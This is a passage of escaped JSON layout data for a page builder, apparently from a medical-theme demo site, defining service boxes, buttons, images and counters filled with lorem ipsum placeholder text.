Specialist?\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f3xjgbz\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"margin: 0;\\\">Our best specialists are available to help you<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2loj7u3\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Vivamus consectetuer risus et tortor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus ante dapibus diam. Sed nisi. Nulla quis sem at nibh elementum imperdiet. Duis sagittis ipsum.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ngtoz6e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved 